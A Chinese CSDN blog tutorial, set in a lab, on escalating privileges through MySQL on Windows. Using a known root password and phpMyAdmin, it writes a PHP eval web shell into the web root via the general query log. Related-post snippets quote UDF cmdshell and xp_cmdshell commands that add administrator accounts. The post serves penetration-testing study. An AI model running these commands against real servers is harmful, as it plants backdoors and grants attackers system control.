mysql提权win_Windows下MySql提权分析

最新推荐文章于 2023-05-29 20:57:39 发布
最新推荐文章于 2023-05-29 20:57:39 发布
阅读量231 收藏
点赞数
文章标签: mysql提权win
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30861557/article/details/113271255
版权

写在前面的废话(忽略)

这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows的提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码的情况(root密码已知)下,或者注入、爆破拿到root密码下,可以考虑mysql提权。文章内容很基础,下面对这些方法进行一些粗谈!

实验环境

靶机A: Windows 7 SP1

靶机B: Windows server 2003 enterprise x64

Phpstudy搭建的php+mysql

php版本:5.4.45

mysql版本:5.5.53

攻击环境:已知root账号密码,网站存在phpmyadmin页面

通过phpmyadmin来getshell

简单测试

利用log变量,猜一下绝对路径

0fcda4367f11d485deaad2187058683d.gif

看到phpstudy,猜测根目录在WWW下,into outfile写个马测一下能传不

0fcda4367f11d485deaad2187058683d.gif

果然是用不成into outfile,因为file_priv为null,那么尝试使用日志写马

利用日志写shell

开启日志记录

set global general_log='on';

日志文件导出指定目录

set global general_log_file='C:/phpstudy/WWW/hp.php';

记录sql语句写马,这里我就是演示一下,没有安全狗,直接传原马

select '<?php  @eval($_POST["hp"]); ?>';

关闭记录

set global general_log=off;

菜刀连接

url: 192.168.11.106/hp.php

0fcda4367f11d485deaad2187058683d.gif

看一下权限,普通成员hpd0egr,创建用户错误5。接下来开始提权之路!

18992697150
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL_python-1.2.5-cp27-none-win_amd64.zip
11-19
windowsmysql_python安装不成功,需要先安装安装MySQL_python-1.2.5-cp27-none-win_amd64.whl,下载后 pip install 安装即可。本版本是python2.7版,如果其他版本,需要修改名字,如python3.6版本,只需改成MySQL_...
lib_mysqludf_sys 的win版本dll库
12-01
"lib_mysqludf_sys 的win版本dll库"这一标题明确指出,我们正在讨论的是一个专为Windows操作系统设计的动态链接库(Dynamic Link Library, DLL)文件,名为lib_mysqludf_sys。DLL是Windows系统中用于封装可重用代码...
mysql提权_mysql提权总结方法四则
weixin_36356002的博客
01-18 178
一 UDF提权这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:createfunction cmdshell returns string soname 'udf.dll'select cmdshell('net useriis_user 123!@#abcABC /add');select cmdshell('net localgroup administrators iis_use...
Windows下三种mysql提权剖析
bylfsj的博客
03-27 1226
<p></p><hr> title: Windows下三种mysql提权剖析 索引 这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码...
Windows提权mysql数据库提权(UDF提权)
mrx56的博客
03-31 3100
可通过sqlmap或者msf获取udf文件。
Windows提权:利用MySQL数据库
qq_61553520的博客
05-29 911
udf = 'user defined function',即‘用户自定义函数是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
Windows提权之第三方组件mysql提权(mof)
mrx56的博客
03-31 3762
为什么要提权? 答:因为webshell的权限一般是继承中间件的权限,此时就需要提高到系统管理员权限才方便进一步渗透。一般java中间件运行权限最高。 Windows提权常用命令 内置组: Administrators(管理员组) Guests (来宾组,权限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
mysql_markdown_win.zip
11-26
3. **mysql_markdown_win.zip**:这很可能是MySQL Markdown工具的Windows版本,它能够解析MySQL数据库的表结构,并将其转换为Markdown格式的文档。用户可以使用这个工具快速创建易于阅读和分享的数据库设计文档。 4...
MySQL提权专用网马
05-10
第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中...
mysql.zip_MYSQL_c mysql_c# mysql
09-19
在“mysql.zip_MYSQL_c mysql_c# mysql”这个压缩包中,包含了一系列关于如何在C和C#环境下使用MySQL的文档和教程。 1. **MYSQL_C_API详解.doc**:这份文档可能详细介绍了MySQL C API的各种函数和结构体,包括如何...
mysql的root权限下提权
02-28
mysql的root权限下提权
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
Windows mysql 提权_Windows下三种mysql提权剖析
weixin_32085599的博客
01-19 127
title: Windows下三种mysql提权剖析索引这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码的情况(root密码已知)下,或者注入、爆破拿到root密码下,可以考虑mysql提权。文章内容很基...
mysql window下 安装udf_windows+MYSQL+UDF提权
weixin_39677106的博客
12-24 243
测试环境windows2008如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录如果mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\wi...
mysql root 2008 提权_mysql root 提权方法
weixin_35186551的博客
01-19 68
1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了MYSQL的的BIN目录中2、让我们来看看服务器中有些什么数据库mysql>show databases;MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。3、让我们进入数据库mysql>use test...
mysql 2008提权_通过Mssql提权的几种姿势
weixin_32101377的博客
02-26 282
本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法。一、 xp_cmdshell提权上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行:exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'就能成功的创建一个账户aaa并且加到...
mysql 提权方法_MySQL提权简单方法
weixin_39966020的博客
01-19 87
前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来***服务器。最早看到相关的报道是在o-otik上,但是公布的是针对 Unix系统的Exploit,并且成功率也不是很高.而近期,国内有高手放出针对Win系统的相关文章,于是我马上找来与朋友一同研究.其实我们早就能想到.当我们在对MSSQL\Oracle数据库进行***的时候,得到了最数据库...
Mysql提权实战
永不垂头的博客
08-07 167
Mysql提权实战 Mysql提权实战 into outfile select * from table into outfile ‘/路径/文件名’ 1.需要知道物理路径 2. magic_quotes_gpc()=off(phpinfo.php) 3.权限支持 写权限 http://192.168.1.105:800/510cms2/news.php?cid=&listid=&newsid=27 and 1=2 UNION SELECT 1,2,3,’<?php eval($P
mysql root 提权_mysql以ROOT权限提权方法
weixin_30111277的博客
01-18 1152
mysql .x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行mysql>system vi /et...
mysql_connector_odbc_win_64
最新发布
10-30
mysql_connector_odbc_win_64 是一个用于在Windows 64位系统上连接MySQL数据库的ODBC驱动程序。ODBC (Open Database Connectivity) 是一种标准的数据库访问接口,可使不同数据库系统之间的应用程序能够通过统一的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值